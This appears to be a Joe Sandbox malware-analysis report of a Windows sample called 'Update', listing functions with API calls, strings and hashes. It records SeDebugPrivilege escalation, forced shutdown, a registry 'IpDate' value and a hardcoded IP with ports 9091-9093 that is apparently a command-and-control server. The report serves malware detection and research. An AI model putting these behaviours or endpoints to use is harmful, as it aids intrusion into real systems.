Opcode Fuzzy Hash: 2a26c06e6776069fd86e8af03b929219765fee5ba31f3b0b58ef0368cfa38ddb
Instruction Fuzzy Hash: EEE022326057184BC221EF85E888B1FF3E8FFCD315F040A8DEA4896204C6B089098B9A

Function 006E15D0 Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006E15DC
memset.VCRUNTIME140(?,00000000,00000003), ref: 006E1602
memset.VCRUNTIME140(?,00000000,00000050), ref: 006E168C
IsDebuggerPresent.KERNEL32 ref: 006E16A8
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006E16C8
UnhandledExceptionFilter.KERNEL32(?), ref: 006E16D2

Memory Dump Source

Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_Update.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID:
API String ID: 1045392073-0
Opcode ID: 4fd6e582b43461b87c912dab2956d96b20761089326c4dcb866f6cac0d39bb14
Instruction ID: 7713cc9e8a73024b1cfee2674073d00e36a8a5838dc55bd1ead6c8f713650dff
Opcode Fuzzy Hash: 4fd6e582b43461b87c912dab2956d96b20761089326c4dcb866f6cac0d39bb14
Instruction Fuzzy Hash: C0310975D063599BDB61DFA5D989BCCBBB9AF08700F10419AE409AB250EB705B84DF04

Function 6CAB68D3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,6CAB62A4,00000002,00000000,?,?,?,6CAB62A4,?,00000000), ref: 6CAB696C
GetLocaleInfoW.KERNEL32(00000000,20001004,6CAB62A4,00000002,00000000,?,?,?,6CAB62A4,?,00000000), ref: 6CAB6995
GetACP.KERNEL32(?,?,6CAB62A4,?,00000000), ref: 6CAB69AA

Strings

OCP, xrefs: 6CAB6927
ACP, xrefs: 6CAB68F1

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: f558711f51adbb22f16e817dc3bd865cdb2829620eb5f65f134834fffa841500
Instruction ID: fde36951c8be286b6e6c55c079c1fb37aff74901bcc3cb4aee3243d7eedc306e
Opcode Fuzzy Hash: f558711f51adbb22f16e817dc3bd865cdb2829620eb5f65f134834fffa841500
Instruction Fuzzy Hash: E521A432704201A6E71C8F99C944B9777BEAF44B58B6E8524E909F7B04E732DEC1C350

Function 037F7740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037F78FC), ref: 037F7756
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037F78FC,?,?,?,?,?,?,74DF0630), ref: 037F775D
LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 037F7785
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 037F77B9

Strings

SeDebugPrivilege, xrefs: 037F777E

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 2349140579-2896544425
Opcode ID: a1b1cc75e1917e428cfb0f20258482eb80edcc9e1224be6fe5fe84c97f3e2fcc
Instruction ID: 4ee71cc3ab90b000916079b3a73c407fbcaf46267b7b5d79b36e322676d5be5a
Opcode Fuzzy Hash: a1b1cc75e1917e428cfb0f20258482eb80edcc9e1224be6fe5fe84c97f3e2fcc
Instruction Fuzzy Hash: 4A112571B5020CAFDB04DFE5DC59BAEB7B8FB48704F108599E605AB280DA759505CB60

Function 6CAB616E Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CAAA893: GetLastError.KERNEL32(?,?,6CAA5151,?,6CA81A6D,00000000), ref: 6CAAA897
Part of subcall function 6CAAA893: SetLastError.KERNEL32(00000000,6CA81A6D,00000000), ref: 6CAAA939

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 6CAB6276
IsValidCodePage.KERNEL32(00000000), ref: 6CAB62B4
IsValidLocale.KERNEL32(?,00000001), ref: 6CAB62C7
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6CAB630F
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6CAB632A

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 432b794bf31d8d965d8087d38eac6c3e89c057afeb5d2d5fbc97662c7bef3531
Instruction ID: 9f119734a165a48e9f304b7fe8d3ba46638315deeca327bf6186ce88f800d47a
Opcode Fuzzy Hash: 432b794bf31d8d965d8087d38eac6c3e89c057afeb5d2d5fbc97662c7bef3531
Instruction Fuzzy Hash: DD514F71A0160AABFF08DFA5CC44AEA77BCBF05704F184469E924F7640E771DA898B61

Function 037FF00A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0380131C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03801331
UnhandledExceptionFilter.KERNEL32(038125B8), ref: 0380133C
GetCurrentProcess.KERNEL32(C0000409), ref: 03801358
TerminateProcess.KERNEL32(00000000), ref: 0380135F

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: df865d703748eb73ddcc5de86b54f03e16d3359d7c721df42f816d0d1a19c323
Instruction ID: f31ef195cf4d8413bc161a95efd183dc2ee4c34d00f637a9d6d838f418c54a18
Opcode Fuzzy Hash: df865d703748eb73ddcc5de86b54f03e16d3359d7c721df42f816d0d1a19c323
Instruction Fuzzy Hash: A821E3B9544A24DFC790FF68F544649BBACFB08310F1006DAEA08C7389EB745580DF95

Function 10006815 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 1000793D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10007952
UnhandledExceptionFilter.KERNEL32(10015350), ref: 1000795D
GetCurrentProcess.KERNEL32(C0000409), ref: 10007979
TerminateProcess.KERNEL32(00000000), ref: 10007980

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
Instruction ID: 193b6f3057f50b32987db54b87c2b31a729b11eea6cfb014211f1eca9ce5fffe
Opcode Fuzzy Hash: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
Instruction Fuzzy Hash: 7221AFB4818264EFF702DF68CDC96597BE5FB0A355F509019E5088B261EB75D5C0CF81

Function 6CA86520 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(6CA86EEE,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6CA86570
CryptStringToBinaryA.CRYPT32(C708C483,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6CA8660E
___std_exception_copy.LIBVCRUNTIME ref: 6CA8666D

Strings

Failed to calculate base64 decoded size., xrefs: 6CA86630

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: BinaryCryptString$___std_exception_copy
String ID: Failed to calculate base64 decoded size.
API String ID: 2515837927-3365390155
Opcode ID: f43c02b47a32919092e55837df0c59286d6c1e1b0caaa97f4e021d56e5d4cb96
Instruction ID: 8369f4091cebfc8669315e0c968e8a8740a608b0421c58f02c377a9a9d0f1a29
Opcode Fuzzy Hash: f43c02b47a32919092e55837df0c59286d6c1e1b0caaa97f4e021d56e5d4cb96
Instruction Fuzzy Hash: AA418EB1E12308AFEB14CF94CD45BDEBBB8FB04714F144529E905ABB80D774A588CBA1

Function 6CAA58B0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73040311bb29c5914551622f8c1703dce3cbee9cddaee4a5e747c8be854a9458
Instruction ID: b87b1c764d92e44443031afec7c04a079ce0d45c243a2dd07328c67c4a4eb49b
Opcode Fuzzy Hash: 73040311bb29c5914551622f8c1703dce3cbee9cddaee4a5e747c8be854a9458
Instruction Fuzzy Hash: 62025C71E016199FDB14CFA9C88069EBBF1FF48318F28826AD515EB740D730A986CB94

Function 6CAAF888 Relevance: 6.2, APIs: 4, Instructions: 205COMMONLIBRARYCODE

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6CAAF978

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6c5800d434e9ab18f7952012b10f1ef83db28296d5cdac02962f68965a54fc41
Instruction ID: 976246d68dbd42b3c66b21baac17b234a16d846177bfd5eef1cbf6867d2fa4cc
Opcode Fuzzy Hash: 6c5800d434e9ab18f7952012b10f1ef83db28296d5cdac02962f68965a54fc41
Instruction Fuzzy Hash: B971E67190615D6FDF199FA8CC88AEABBB9AF05308F1841DEE05997610DB314ECA8F14

Function 6CA9C85A Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 6CA9C866
IsDebuggerPresent.KERNEL32 ref: 6CA9C932
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CA9C94B
UnhandledExceptionFilter.KERNEL32(?), ref: 6CA9C955

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d61e908850b870dcf0218780f12bcb1d27bafaa9752df206545a06fc7b7856fe
Instruction ID: f547385ae3cb58b1697d572501f0d35cebd772dbf76c8e4a53908ab6f0a456a2
Opcode Fuzzy Hash: d61e908850b870dcf0218780f12bcb1d27bafaa9752df206545a06fc7b7856fe
Instruction Fuzzy Hash: 2D31E575D113199BDF20EFA4C9897CDBBF8AF08304F1041EAE40DAB250EB719A858F45

Function 6CAA3AAF Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6CAA3BA7
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6CAA3BB1
UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 6CAA3BBE

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 79e67d5dbad2f81970bf985df33910805b8258d122f5475f4b4e06890ca3226b
Instruction ID: 0a974f97d31f9be6146345ce6a623f6ecccfd9ed9c8ea67c30180bfd23b1a0b5
Opcode Fuzzy Hash: 79e67d5dbad2f81970bf985df33910805b8258d122f5475f4b4e06890ca3226b
Instruction Fuzzy Hash: C031D37491122D9BCB21DF68D989BCCBBF8BF08314F5041EAE41CA7650EB709B858F44

Function 037FB463 Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 037F7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 037F7B89
Part of subcall function 037F7B70: OpenProcessToken.ADVAPI32(00000000), ref: 037F7B90
Part of subcall function 037F7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 037F7BB6
Part of subcall function 037F7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 037F7BCC
Part of subcall function 037F7B70: GetLastError.KERNEL32 ref: 037F7BD2
Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BE0

ExitWindowsEx.USER32(00000005,00000000), ref: 037FB471

Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BFB

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: fdc56b34c163e72860b89c61ec94bdafa03c2fdd61e6d75f2dc88e527cb8f201
Instruction ID: dd75357d3f6a6f811009f2d51f0844fd0faa6bc4258fd2484b54ea9506aa70bb
Opcode Fuzzy Hash: fdc56b34c163e72860b89c61ec94bdafa03c2fdd61e6d75f2dc88e527cb8f201
Instruction Fuzzy Hash: 9AC08C363402400AD218B2B8782AB6AB344EB85362F00046BA70ACC1C04C5284920AA6

Function 037FB43F Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 037F7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 037F7B89
Part of subcall function 037F7B70: OpenProcessToken.ADVAPI32(00000000), ref: 037F7B90
Part of subcall function 037F7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 037F7BB6
Part of subcall function 037F7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 037F7BCC
Part of subcall function 037F7B70: GetLastError.KERNEL32 ref: 037F7BD2
Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BE0

ExitWindowsEx.USER32(00000006,00000000), ref: 037FB44D

Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BFB

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: d83c60af634967df5e6b09aa74bfa92ca929f0f9f7eaa1590320d05b6b35e33d
Instruction ID: 7f855f6fc2d21135c68f0b4f71bdc0999029bb44493c824c80f9ee632b6080e0
Opcode Fuzzy Hash: d83c60af634967df5e6b09aa74bfa92ca929f0f9f7eaa1590320d05b6b35e33d
Instruction Fuzzy Hash: 51C08C363402000AD218B2B8782AB6AB340EB85362F00046BA70ACC1C04C5384A246A6

Function 037FB41B Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 037F7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 037F7B89
Part of subcall function 037F7B70: OpenProcessToken.ADVAPI32(00000000), ref: 037F7B90
Part of subcall function 037F7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 037F7BB6
Part of subcall function 037F7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 037F7BCC
Part of subcall function 037F7B70: GetLastError.KERNEL32 ref: 037F7BD2
Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BE0

ExitWindowsEx.USER32(00000004,00000000), ref: 037FB429

Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BFB

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: 79c3aad3575d0ab314f0491ca01f6a9267029e3a601f669ff1a3979f68e04346
Instruction ID: 2436a06b762061dbd9aced483324522a954905bdd136e8cf10df01ec6689aaac
Opcode Fuzzy Hash: 79c3aad3575d0ab314f0491ca01f6a9267029e3a601f669ff1a3979f68e04346
Instruction Fuzzy Hash: 5CC08C363402000AD218B3B8782AB69B340EB85362F00046BA70ACC1C04C62849206AA

Function 006E1764 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001770,006E10D3), ref: 006E1769

Memory Dump Source

Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_Update.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8621fed2281935648df01e4e72106bc649e86534026f44bf9239f3f11845602a
Instruction ID: 0751186066844e4ec0dd84f6e8e942af3bc9f74c48932859235973be477a1fe8
Opcode Fuzzy Hash: 8621fed2281935648df01e4e72106bc649e86534026f44bf9239f3f11845602a
Instruction Fuzzy Hash:

Function 037FB556 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 161registrysleepCOMMON

Download Yara Rule

APIs

Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721

RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 037FB586
RegDeleteValueW.ADVAPI32(?,IpDate), ref: 037FB596
RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 037FB5B3
_memset.LIBCMT ref: 037FB5D4
RegCloseKey.ADVAPI32(?), ref: 037FB61B
_memset.LIBCMT ref: 037FB63C
RegCloseKey.ADVAPI32(?), ref: 037FB72C
Sleep.KERNEL32(000007D0), ref: 037FB737

Part of subcall function 037FF707: std::exception::exception.LIBCMT ref: 037FF756
Part of subcall function 037FF707: std::exception::exception.LIBCMT ref: 037FF770
Part of subcall function 037FF707: __CxxThrowException@8.LIBCMT ref: 037FF781

Strings

9092, xrefs: 037FB6C9
p2:, xrefs: 037FB6B9
IpDate, xrefs: 037FB590, 037FB5AD
137.220.229.61, xrefs: 037FB67E
Console, xrefs: 037FB57C
137.220.229.61, xrefs: 037FB6ED
p1:, xrefs: 037FB683
t2:, xrefs: 037FB6E0
137.220.229.61, xrefs: 037FB6B4
o3:, xrefs: 037FB704
t1:, xrefs: 037FB6A7
o2:, xrefs: 037FB6CE
o1:, xrefs: 037FB695
9093, xrefs: 037FB6FF
p3:, xrefs: 037FB6F2
9091, xrefs: 037FB690
t3:, xrefs: 037FB719

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
String ID: 137.220.229.61$137.220.229.61$137.220.229.61$9091$9092$9093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
API String ID: 1186799303-3585975511
Opcode ID: 9e6784962ca11a5524c59ead3b5bf7d7465e3a66cec7151b6dd40af004174620
Instruction ID: 882c153c3719ced761d1b2295ee9cb1c42b4e096a59b52dd384cec5271381155
Opcode Fuzzy Hash: 9e6784962ca11a5524c59ead3b5bf7d7465e3a66cec7151b6dd40af004174620
Instruction Fuzzy Hash: B54196757803007FE610E794EC4AF5E735CAF85B10F144194FB15BE382DAE8B52586AB

Function 03804014 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 0380401C
__mtterm.LIBCMT ref: 03804028

Part of subcall function 03803CF1: DecodePointer.KERNEL32(0000000A,03801084,0380106A,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03803D02
Part of subcall function 03803CF1: TlsFree.KERNEL32(00000021,03801084,0380106A,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03803D1C
Part of subcall function 03803CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03801084,0380106A,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03808D48
Part of subcall function 03803CF1: _free.LIBCMT ref: 03808D4B
Part of subcall function 03803CF1: DeleteCriticalSection.KERNEL32(00000021,?,?,03801084,0380106A,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03808D72

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0380403E
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0380404B
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03804058
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03804065
TlsAlloc.KERNEL32(?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 038040B5
TlsSetValue.KERNEL32(00000000,?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 038040D0
__init_pointers.LIBCMT ref: 038040DA
EncodePointer.KERNEL32(?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 038040EB
EncodePointer.KERNEL32(?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 038040F8
EncodePointer.KERNEL32(?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03804105
EncodePointer.KERNEL32(?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03804112
DecodePointer.KERNEL32(Function_00013E75,?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03804133
__calloc_crt.LIBCMT ref: 03804148
DecodePointer.KERNEL32(00000000,?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03804162
GetCurrentThreadId.KERNEL32 ref: 03804174

Strings

FlsGetValue, xrefs: 03804040
KERNEL32.DLL, xrefs: 03804017
FlsFree, xrefs: 0380405A
